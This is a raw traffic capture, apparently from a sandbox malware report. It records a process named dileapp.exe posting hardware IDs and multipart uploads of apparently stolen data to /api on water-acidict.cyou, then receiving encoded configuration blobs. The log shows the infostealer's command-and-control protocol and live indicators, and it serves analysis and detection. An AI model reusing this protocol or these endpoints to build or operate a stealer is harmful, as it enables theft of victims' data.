                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:17 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 24490
                                                                                                                                      2024-11-29 22:10:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                      2024-11-29 22:10:18 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.449753172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:18 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=HVENPYA281G5
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20401
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:18 UTC15331OUTData Raw: 2d 2d 48 56 45 4e 50 59 41 32 38 31 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 48 56 45 4e 50 59 41 32 38 31 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 56 45 4e 50 59 41 32 38 31 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 48 56 45 4e 50 59 41 32 38 31 47 35 0d 0a
                                                                                                                                      Data Ascii: --HVENPYA281G5Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--HVENPYA281G5Content-Disposition: form-data; name="pid"3--HVENPYA281G5Content-Disposition: form-data; name="lid"c2CoW0--bandl--HVENPYA281G5
                                                                                                                                      2024-11-29 22:10:18 UTC5070OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                      2024-11-29 22:10:19 UTC1026INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:19 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=hmet8lo2rkua5031qp3ul9f6bh; expires=Tue, 25-Mar-2025 15:56:58 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k97UZApMDwAdhYiwijzt%2B%2FmmeMkhU2aX%2Bu0fHy8yzalx9faUTMvWyUaxrq9f3fc7SzAyY9HxNEXLYzff4IsgK0BqHnMWW7%2BUdWCdBK3CqPsUXbp9qmW%2FD8doLw2yN3%2Bukm53ogI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed55bea18cdc-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1949&rtt_var=745&sent=18&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21359&delivery_rate=1455633&cwnd=250&unsent_bytes=0&cid=985b161db98c2a1e&ts=1018&x=0"
                                                                                                                                      2024-11-29 22:10:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.449756172.67.156.2174437568C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:20 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 47
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:20 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--bandl&j=
                                                                                                                                      2024-11-29 22:10:21 UTC1013INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:21 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=vlc2gqjq75kq1a1k9sehrejdp1; expires=Tue, 25-Mar-2025 15:56:59 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXgXSZpIPkc5wikVv4slk5dTMpF6yl22NKlsaXFjCe55fqLXwhVHEZ2d6EC1chDjzNPSG88JHmeInXqYvxd3NnwTnpq9%2F4oEgnTUDfs56rMloyss8HYvi%2F9cidPVqHPAUqvqbsk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed5eea7c7d24-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1794&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=949&delivery_rate=1547429&cwnd=193&unsent_bytes=0&cid=b0660ed8591edc55&ts=829&x=0"
                                                                                                                                      2024-11-29 22:10:21 UTC356INData Raw: 34 34 38 38 0d 0a 62 47 43 56 37 43 77 59 75 66 49 66 44 30 73 41 78 57 31 78 37 31 30 58 69 6b 4c 4c 42 39 6e 31 74 41 71 57 6f 69 65 45 4b 45 4d 58 51 75 50 4f 46 69 79 56 30 47 78 71 61 54 71 78 48 77 53 4b 63 54 58 72 4a 75 6b 39 76 35 54 59 65 66 4f 4f 42 66 4a 46 59 56 59 47 39 49 42 66 66 5a 58 51 65 6e 64 70 4f 70 34 57 55 34 6f 7a 4e 62 42 67 72 6d 32 37 6c 4e 68 6f 39 38 6c 49 39 45 51 67 42 41 7a 79 68 45 6c 37 33 5a 4e 7a 59 69 35 6c 6f 41 77 62 67 54 52 36 34 69 2f 70 4b 2f 75 51 7a 69 69 73 67 47 72 68 58 43 49 68 41 65 61 48 44 6d 57 56 69 54 31 71 4a 53 4c 2f 54 78 43 4b 50 33 76 73 4a 71 42 76 73 5a 33 51 61 66 4c 49 56 2b 31 4f 4b 77 51 43 38 59 56 44 63 73 6d 65 65 57 55 6c 59 36 6f 4d 55 38 4e 2f 63 76 42 67 38 53 58 6f 70 64 56 35 35
                                                                                                                                      Data Ascii: 4488bGCV7CwYufIfD0sAxW1x710XikLLB9n1tAqWoieEKEMXQuPOFiyV0GxqaTqxHwSKcTXrJuk9v5TYefOOBfJFYVYG9IBffZXQendpOp4WU4ozNbBgrm27lNho98lI9EQgBAzyhEl73ZNzYi5loAwbgTR64i/pK/uQziisgGrhXCIhAeaHDmWViT1qJSL/TxCKP3vsJqBvsZ3QafLIV+1OKwQC8YVDcsmeeWUlY6oMU8N/cvBg8SXopdV55
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 75 43 64 57 59 69 5a 37 55 45 47 6f 41 79 64 65 55 71 70 6d 61 37 6b 4e 78 69 2b 38 70 42 36 30 63 6e 44 67 4b 33 77 41 35 39 77 39 41 6c 4c 51 70 6e 74 77 67 66 6d 33 31 50 71 44 2f 6e 66 50 75 51 32 69 69 73 67 45 33 6a 53 53 49 46 44 66 53 47 52 57 6a 62 67 6e 74 67 4c 48 43 68 43 68 32 48 50 47 66 69 4c 71 39 6d 73 70 7a 66 62 66 50 45 42 61 67 4b 4a 68 5a 43 72 38 35 76 64 39 43 63 64 33 6f 70 49 72 68 42 43 73 30 34 65 61 68 34 36 57 47 36 6b 39 64 73 2b 73 35 42 36 6b 77 76 41 77 33 78 68 45 35 39 30 5a 68 31 62 43 52 70 71 41 38 57 67 44 74 7a 35 43 47 73 4a 66 58 58 30 58 43 30 6d 41 58 49 54 53 49 63 51 4d 4b 4e 51 48 54 63 68 6a 31 79 5a 33 76 6e 43 42 2f 4e 5a 7a 58 6d 4a 61 5a 33 75 6f 58 54 5a 75 62 4d 51 4f 42 48 49 67 41 43 38 6f 6c 44 64
                                                                                                                                      Data Ascii: uCdWYiZ7UEGoAydeUqpma7kNxi+8pB60cnDgK3wA59w9AlLQpntwgfm31PqD/nfPuQ2iisgE3jSSIFDfSGRWjbgntgLHChCh2HPGfiLq9mspzfbfPEBagKJhZCr85vd9Ccd3opIrhBCs04eah46WG6k9ds+s5B6kwvAw3xhE590Zh1bCRpqA8WgDtz5CGsJfXX0XC0mAXITSIcQMKNQHTchj1yZ3vnCB/NZzXmJaZ3uoXTZubMQOBHIgAC8olDd
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 79 5a 33 76 6e 43 42 2f 4e 5a 7a 58 6b 4b 61 6c 75 73 5a 50 57 62 2f 6e 46 52 75 46 4a 4c 41 6b 49 2b 59 6c 4b 64 74 4b 64 65 32 30 75 5a 71 49 64 46 6f 51 7a 65 61 68 75 36 57 4b 6a 31 34 34 6f 32 38 64 54 35 57 55 69 48 77 75 33 6b 51 42 6a 6d 35 64 78 4c 58 45 69 6f 41 6f 62 68 6a 6c 39 36 44 4b 73 61 37 43 57 33 47 37 31 7a 55 6e 67 53 69 41 4f 42 50 75 4f 53 58 33 4a 67 6e 68 72 4f 32 6a 6e 51 56 4f 4b 4a 7a 57 77 59 4a 39 31 72 49 62 41 4b 73 48 44 53 2b 68 4e 4e 30 34 64 75 5a 63 4f 66 64 66 51 4a 53 30 69 59 71 73 49 47 34 73 37 66 65 63 76 6f 48 65 36 6d 39 68 36 38 38 42 4d 36 45 55 74 42 77 2f 77 67 30 56 77 31 70 52 36 62 47 6b 73 35 77 67 4c 7a 57 63 31 33 6a 43 6b 61 5a 57 63 32 6d 47 30 33 77 76 2f 43 69 59 43 51 71 2f 4f 53 6e 62 54 6d 6e
                                                                                                                                      Data Ascii: yZ3vnCB/NZzXkKalusZPWb/nFRuFJLAkI+YlKdtKde20uZqIdFoQzeahu6WKj144o28dT5WUiHwu3kQBjm5dxLXEioAobhjl96DKsa7CW3G71zUngSiAOBPuOSX3JgnhrO2jnQVOKJzWwYJ91rIbAKsHDS+hNN04duZcOfdfQJS0iYqsIG4s7fecvoHe6m9h688BM6EUtBw/wg0Vw1pR6bGks5wgLzWc13jCkaZWc2mG03wv/CiYCQq/OSnbTmn
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 6f 77 67 58 69 7a 41 31 70 6d 43 75 66 66 76 50 6c 6b 66 54 39 51 66 48 63 47 45 52 54 4f 37 4f 53 58 61 62 79 44 31 68 4b 6d 36 76 41 42 57 45 4d 33 2f 68 4b 36 56 75 76 35 76 66 62 66 4c 42 51 4f 4e 4c 4a 51 49 49 38 59 31 4e 64 64 53 66 64 53 31 6e 49 71 41 58 55 39 56 2f 55 50 38 72 70 32 50 37 69 4a 68 78 74 4d 64 4a 70 68 4a 68 41 67 76 78 69 45 74 32 32 70 5a 31 61 43 46 6d 70 67 6b 56 6a 6a 42 78 37 53 47 6d 59 62 65 5a 33 47 6e 31 7a 45 37 70 51 53 52 4f 54 4c 65 4a 56 6a 71 44 30 45 78 75 50 33 57 33 41 31 4f 53 63 57 79 6f 4a 36 55 6c 34 39 66 58 65 76 37 4b 53 2b 4e 46 4a 41 30 4e 38 49 4e 49 64 74 47 5a 64 57 73 6d 61 37 55 4d 48 34 4d 34 65 2b 51 75 70 47 2b 34 6d 70 59 6d 74 4d 64 64 70 68 4a 68 49 67 58 36 6f 45 56 32 33 4e 42 69 49 7a 41
                                                                                                                                      Data Ascii: owgXizA1pmCuffvPlkfT9QfHcGERTO7OSXabyD1hKm6vABWEM3/hK6Vuv5vfbfLBQONLJQII8Y1NddSfdS1nIqAXU9V/UP8rp2P7iJhxtMdJphJhAgvxiEt22pZ1aCFmpgkVjjBx7SGmYbeZ3Gn1zE7pQSROTLeJVjqD0ExuP3W3A1OScWyoJ6Ul49fXev7KS+NFJA0N8INIdtGZdWsma7UMH4M4e+QupG+4mpYmtMddphJhIgX6oEV23NBiIzA
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 4a 56 2f 4c 61 67 57 72 6e 57 72 6c 4a 52 5a 34 73 4e 54 37 55 63 74 54 68 32 35 6c 77 35 39 31 39 41 6c 4c 53 39 74 72 67 77 63 6a 44 5a 35 35 53 57 67 59 4c 71 52 30 6d 4c 2b 77 45 50 67 53 79 51 45 41 66 61 45 52 33 33 54 6c 33 35 2f 61 53 7a 6e 43 41 76 4e 5a 7a 58 42 4a 37 74 72 71 39 66 4a 4a 75 32 41 51 75 6f 4b 65 55 34 47 2f 59 46 4b 66 64 65 57 65 47 73 6b 59 36 67 4f 45 34 49 37 66 75 45 6d 71 47 69 2b 6d 74 4a 36 2f 73 74 4b 36 6b 4d 74 41 30 4b 35 7a 6b 6c 69 6d 38 67 39 58 43 52 73 71 51 67 46 7a 53 41 37 38 57 43 75 61 66 76 50 6c 6d 6e 34 7a 30 62 70 53 53 49 50 43 4f 57 63 51 6e 50 54 6c 58 46 6d 4a 32 53 31 43 52 79 45 50 48 62 68 4a 36 46 70 73 5a 54 52 4b 4c 71 41 51 76 34 4b 65 55 34 68 34 4a 35 44 4f 73 54 65 5a 43 30 75 62 75 64 58
                                                                                                                                      Data Ascii: JV/LagWrnWrlJRZ4sNT7UctTh25lw5919AlLS9trgwcjDZ55SWgYLqR0mL+wEPgSyQEAfaER33Tl35/aSznCAvNZzXBJ7trq9fJJu2AQuoKeU4G/YFKfdeWeGskY6gOE4I7fuEmqGi+mtJ6/stK6kMtA0K5zklim8g9XCRsqQgFzSA78WCuafvPlmn4z0bpSSIPCOWcQnPTlXFmJ2S1CRyEPHbhJ6FpsZTRKLqAQv4KeU4h4J5DOsTeZC0ubudX
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 44 75 4c 36 5a 73 73 70 50 65 61 2f 54 45 51 65 46 50 49 67 49 4a 38 49 31 42 66 74 4b 65 64 47 4a 70 4c 4f 63 49 43 38 31 6e 4e 63 6b 37 71 6d 6d 32 31 38 6b 6d 37 59 42 43 36 67 70 35 54 67 37 35 69 30 35 77 33 5a 52 34 61 79 4e 6e 70 77 51 51 67 6a 74 7a 37 43 2b 70 62 72 4b 57 30 47 33 2b 79 30 50 72 53 53 63 49 51 72 6e 4f 53 57 4b 62 79 44 31 4e 4d 6d 2b 72 43 46 4f 53 63 57 79 6f 4a 36 55 6c 34 39 66 64 5a 50 44 48 52 65 74 4a 4b 51 73 47 2f 59 74 4f 63 73 6d 59 66 57 6f 37 63 4b 63 47 46 6f 45 38 64 65 77 6d 6f 47 4f 34 6b 35 59 6d 74 4d 64 64 70 68 4a 68 49 77 37 77 70 30 6c 68 6d 34 38 7a 64 47 6c 6c 71 30 39 4c 7a 54 35 2b 34 69 2b 6b 5a 72 32 55 33 57 33 2b 77 55 4c 75 52 7a 4d 4e 44 66 69 4b 54 6e 58 64 6c 6e 78 69 4c 32 57 75 44 68 75 4b 66
                                                                                                                                      Data Ascii: DuL6ZsspPea/TEQeFPIgIJ8I1BftKedGJpLOcIC81nNck7qmm218km7YBC6gp5Tg75i05w3ZR4ayNnpwQQgjtz7C+pbrKW0G3+y0PrSScIQrnOSWKbyD1NMm+rCFOScWyoJ6Ul49fdZPDHRetJKQsG/YtOcsmYfWo7cKcGFoE8dewmoGO4k5YmtMddphJhIw7wp0lhm48zdGllq09LzT5+4i+kZr2U3W3+wULuRzMNDfiKTnXdlnxiL2WuDhuKf
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 4f 63 37 47 51 78 6d 2f 6a 7a 77 57 6f 43 69 35 4f 57 73 37 4f 52 33 33 41 67 57 74 67 4f 57 58 6e 4d 46 33 4e 4a 7a 57 77 59 4a 78 6d 74 5a 6e 52 66 75 57 4e 59 76 42 41 4a 68 34 46 34 49 45 4f 4e 4a 75 57 50 54 56 36 4c 4f 63 4c 41 73 31 6e 4a 62 70 37 2f 44 62 73 78 34 52 33 75 74 6b 46 38 41 70 35 58 45 79 33 6e 41 34 69 6d 39 64 2b 66 7a 74 6b 70 42 6b 51 79 67 46 4c 7a 7a 71 6b 59 36 79 47 36 46 62 7a 32 6b 6a 67 58 54 42 43 46 2f 53 41 51 48 33 4e 30 44 4d 74 4a 69 4c 2f 4e 6c 50 46 66 30 71 6d 59 4c 45 6c 34 39 66 6a 61 2f 72 4f 51 76 42 62 62 43 6b 59 2b 6f 68 5a 61 35 76 65 50 57 74 70 4f 76 64 42 55 34 6b 75 4e 62 42 77 2b 7a 37 75 78 49 45 34 70 74 38 4c 2f 77 6f 33 54 6c 71 6c 77 41 35 6f 6d 38 67 39 4b 69 70 77 74 51 6b 51 6d 7a 77 79 31 68
                                                                                                                                      Data Ascii: Oc7GQxm/jzwWoCi5OWs7OR33AgWtgOWXnMF3NJzWwYJxmtZnRfuWNYvBAJh4F4IEONJuWPTV6LOcLAs1nJbp7/Dbsx4R3utkF8Ap5XEy3nA4im9d+fztkpBkQygFLzzqkY6yG6Fbz2kjgXTBCF/SAQH3N0DMtJiL/NlPFf0qmYLEl49fja/rOQvBbbCkY+ohZa5vePWtpOvdBU4kuNbBw+z7uxIE4pt8L/wo3TlqlwA5om8g9KipwtQkQmzwy1h
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 6f 74 56 6d 2b 73 64 54 39 77 63 47 41 41 58 32 6d 46 35 74 31 4e 41 7a 4c 53 38 69 2f 31 31 64 7a 54 74 6b 71 48 6a 35 4e 2b 44 43 68 54 2b 6b 6b 6c 71 6f 55 32 45 59 51 71 2f 63 41 44 72 4a 30 43 55 74 62 6d 47 31 48 52 57 4f 4b 58 61 76 48 70 64 43 74 5a 44 58 66 75 54 58 53 71 6c 6b 46 79 38 38 79 5a 74 4e 64 4e 57 58 61 33 78 70 4c 4f 63 41 55 39 55 47 4e 61 42 67 6c 69 76 37 6a 35 59 77 74 50 56 47 36 45 51 6d 47 42 4f 36 71 55 42 39 32 6f 5a 74 65 69 59 74 69 54 6b 79 7a 58 45 31 37 6d 44 78 4e 2f 58 58 30 6e 6d 30 6d 42 57 30 45 58 52 64 56 61 66 63 55 54 54 43 30 47 73 74 63 54 44 70 54 77 48 4e 5a 7a 57 76 49 37 74 33 76 5a 54 41 61 37 50 2b 65 38 46 45 4a 67 38 55 35 34 4e 43 57 39 69 42 64 31 4d 58 64 36 51 42 48 59 6f 70 5a 4b 68 75 36 57 72
                                                                                                                                      Data Ascii: otVm+sdT9wcGAAX2mF5t1NAzLS8i/11dzTtkqHj5N+DChT+kklqoU2EYQq/cADrJ0CUtbmG1HRWOKXavHpdCtZDXfuTXSqlkFy88yZtNdNWXa3xpLOcAU9UGNaBgliv7j5YwtPVG6EQmGBO6qUB92oZteiYtiTkyzXE17mDxN/XX0nm0mBW0EXRdVafcUTTC0GstcTDpTwHNZzWvI7t3vZTAa7P+e8FEJg8U54NCW9iBd1MXd6QBHYopZKhu6Wr
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 76 66 57 52 71 46 30 48 79 4d 51 38 4a 35 4e 4f 4f 71 64 65 58 73 38 59 62 63 49 4c 62 4d 53 5a 2b 38 77 71 69 65 58 6b 4e 74 6b 79 76 35 79 39 30 30 78 54 43 54 30 6d 45 30 36 6c 64 42 6c 4c 58 45 69 69 68 30 55 6e 54 77 33 78 43 65 6b 61 66 75 49 6d 48 47 30 31 67 57 2b 47 57 39 4f 45 4c 66 57 44 6a 33 59 67 6d 39 72 4b 6e 53 6b 53 43 32 7a 45 6d 66 76 4d 4b 6f 6e 69 70 72 53 66 75 48 44 56 65 46 30 48 79 4d 51 38 4a 35 4e 4f 50 36 71 50 31 77 2f 59 61 63 42 46 4d 31 78 4e 66 42 67 38 53 57 57 68 64 46 34 39 34 4a 67 33 41 67 51 47 41 48 33 67 45 6b 36 6c 64 42 78 4c 58 45 69 71 68 30 55 6e 54 77 35 37 7a 71 75 4a 61 54 5a 7a 79 6a 69 67 42 32 31 42 47 45 63 51 71 2f 4f 43 58 54 57 6b 58 35 6a 4b 6e 43 31 43 52 43 62 50 44 4c 57 48 6f 5a 75 75 6f 66 62
                                                                                                                                      Data Ascii: vfWRqF0HyMQ8J5NOOqdeXs8YbcILbMSZ+8wqieXkNtkyv5y900xTCT0mE06ldBlLXEiih0UnTw3xCekafuImHG01gW+GW9OELfWDj3Ygm9rKnSkSC2zEmfvMKoniprSfuHDVeF0HyMQ8J5NOP6qP1w/YacBFM1xNfBg8SWWhdF494Jg3AgQGAH3gEk6ldBxLXEiqh0UnTw57zquJaTZzyjigB21BGEcQq/OCXTWkX5jKnC1CRCbPDLWHoZuuofb


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.449757172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:21 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=F9TF042QFM74Q
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1237
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:21 UTC1237OUTData Raw: 2d 2d 46 39 54 46 30 34 32 51 46 4d 37 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 46 39 54 46 30 34 32 51 46 4d 37 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 39 54 46 30 34 32 51 46 4d 37 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 46 39 54 46 30 34 32 51 46 4d 37
                                                                                                                                      Data Ascii: --F9TF042QFM74QContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--F9TF042QFM74QContent-Disposition: form-data; name="pid"1--F9TF042QFM74QContent-Disposition: form-data; name="lid"c2CoW0--bandl--F9TF042QFM7
                                                                                                                                      2024-11-29 22:10:22 UTC1022INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:22 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=6m5bh2gimva0kprlg7tfr59h03; expires=Tue, 25-Mar-2025 15:57:00 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
